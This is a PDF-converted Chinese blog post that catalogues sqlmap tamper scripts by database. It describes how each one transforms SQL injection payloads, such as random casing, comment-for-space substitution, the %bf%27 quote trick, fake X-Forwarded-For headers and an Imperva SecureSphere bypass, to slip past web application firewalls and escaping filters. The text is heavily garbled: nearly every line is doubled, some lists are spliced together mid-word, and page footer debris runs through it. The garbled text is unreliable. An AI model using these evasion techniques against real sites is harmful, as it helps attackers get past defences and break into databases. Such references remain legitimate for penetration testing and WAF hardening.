WAF (usually application based) protectionWAF (usually application based) protection
SAP MaxDBSAP MaxDBifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedforquotes,xforwardedfor
ifnull2ifisnullifnull2ifisnull
Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’
Requirement:Requirement:
* MySQL* MySQL
* SQLite (possibly)* SQLite (possibly)
* SAP MaxDB (possibly)* SAP MaxDB (possibly)
Tested against:Tested against:
* MySQL 5.0 and 5.5* MySQL 5.0 and 5.5
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() functionthat filter the IFNULL() function
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
converted by Web2PDFConvert.com
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
xforwardedforxforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypassAppend a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
SQLiteSQLiteifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2pifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedforlus,unionalltounion,unmagicquotes,xforwardedfor
converted by Web2PDFConvert.com
ifnull2ifisnullifnull2ifisnull
Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’
Requirement:Requirement:
* MySQL* MySQL
* SQLite (possibly)* SQLite (possibly)
* SAP MaxDB (possibly)* SAP MaxDB (possibly)
Tested against:Tested against:
* MySQL 5.0 and 5.5* MySQL 5.0 and 5.5
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() functionthat filter the IFNULL() function
multiplespacesmultiplespaces
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
converted by Web2PDFConvert.com
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2dashspace2dash
Replaces space character (‘ ‘) with a dash comment (‘–’) followed byReplaces space character (‘ ‘) with a dash comment (‘–’) followed by
a random string and a new line (‘\n’)a random string and a new line (‘\n’)
Requirement:Requirement:
* MSSQL* MSSQL
* SQLite* SQLite
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/https://proton.onsec.ru/contest/
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
xforwardedforxforwardedfor
Append a fake HTTP header ‘Append a fake HTTP header ‘XX-Forwarded-For’ to bypass-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
如果您喜欢本博客,欢迎点击图片定订阅到邮箱如果您喜欢本博客,欢迎点击图片定订阅到邮箱
正文部分到此结束正文部分到此结束
converted by Web2PDFConvert.com
由由EMLOGEMLOG强力驱动 主题由强力驱动 主题由暗月暗月设计设计
提交评论清除
文章文章标签标签::文章文章标签标签:: sqlmap sqlmap tampertamper
版版权权声明:声明:版版权权声明:声明:若无特殊注明,本文皆为( 若无特殊注明,本文皆为( mOonmOon )原创,转载请保留文章出处。 )原创,转载请保留文章出处。
也也许许喜喜欢欢::也也许许喜喜欢欢:: «学员渗透录二十九_兄弟连安全检测«学员渗透录二十九_兄弟连安全检测 | | sqlmap使用方法|sqlmap教程|sqlmap命令速查»sqlmap使用方法|sqlmap教程|sqlmap命令速查»
你你肿肿么看?么看? 你你肿肿么看?么看? ↓↓
这篇文章还没有收到评论,赶紧来抢沙发吧~这篇文章还没有收到评论,赶紧来抢沙发吧~
©2012-2016 暗月|博客 ©2012-2016 暗月|博客 站长统计站长统计 网站已安全运行1312天 网站已安全运行1312天 123456123456 sitemapsitemap 网站已安全运行1578天5小时37分53秒网站已安全运行1578天5小时37分53秒
正文部分到此结束正文部分到此结束
你还可以输入 你还可以输入 250250/250 个字/250 个字
让评论变得如此简单。
converted by Web2PDFConvert.com